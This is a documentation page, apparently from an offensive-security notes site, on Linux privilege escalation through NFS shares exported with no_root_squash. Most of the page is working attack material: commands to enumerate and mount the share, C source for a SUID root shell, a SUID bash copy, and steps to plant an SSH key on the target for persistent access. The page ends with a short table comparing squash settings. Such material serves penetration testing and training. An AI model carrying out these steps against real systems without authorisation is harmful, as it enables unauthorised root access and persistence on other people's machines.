> ## Documentation Index
> Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt
> Use this file to discover all available pages before exploring further.

# NFS no_root_squash

> Privilege escalation via NFS misconfiguration: no_root_squash to create SUID binaries as root.

## Overview

NFS (Network File System) shares configured with `no_root_squash` allow remote root users to create files as root on the share. If the share is mounted on the target, any SUID file created will execute as root.

***

## Enumerate NFS Shares

### From Target

```bash theme={"dark"}
cat /etc/exports
showmount -e localhost
```

### From Attacker

```bash theme={"dark"}
showmount -e TARGET_IP
nmap -sV -p 111,2049 TARGET_IP
nmap --script nfs* TARGET_IP
```

### Look For

```
/home/user  *(rw,no_root_squash)
/tmp        *(rw,no_root_squash)
```

`no_root_squash` = remote root keeps root privileges on share.

***

## Exploit

### Step 1 — Mount Share on Attacker (as root)

```bash theme={"dark"}
mkdir /tmp/nfs
mount -t nfs TARGET_IP:/home/user /tmp/nfs
```

### Step 2 — Create SUID Binary

```c theme={"dark"}
#include <unistd.h>

int main() {
    setuid(0);
    setgid(0);
    system("/bin/bash -p");
    return 0;
}
```

```bash theme={"dark"}
gcc shell.c -o /tmp/nfs/shell
chmod +s /tmp/nfs/shell
```

### Step 3 — Execute on Target

```bash theme={"dark"}
/home/user/shell
# root shell
```

***

## Alternative — Copy SUID bash

```bash theme={"dark"}
cp /bin/bash /tmp/nfs/rootbash
chmod +s /tmp/nfs/rootbash
```

On target:

```bash theme={"dark"}
/home/user/rootbash -p
```

***

## Alternative — Write SSH Key

```bash theme={"dark"}
mkdir /tmp/nfs/.ssh
ssh-keygen -t ed25519 -f /tmp/key -N ""
cp /tmp/key.pub /tmp/nfs/.ssh/authorized_keys
chmod 700 /tmp/nfs/.ssh
chmod 600 /tmp/nfs/.ssh/authorized_keys
```

The key was written under the mounted `/home/user` share, so log in as that user (not root — root's keys live in `/root/.ssh`, which isn't mounted here):

```bash theme={"dark"}
ssh -i /tmp/key user@TARGET_IP
```

***

## root\_squash vs no\_root\_squash

| Setting                 | Behavior                                               |
| ----------------------- | ------------------------------------------------------ |
| `root_squash` (default) | Remote root mapped to `nfsnobody` — cannot create SUID |
| `no_root_squash`        | Remote root stays root — full control                  |
| `no_all_squash`         | Non-root users keep their UID                          |
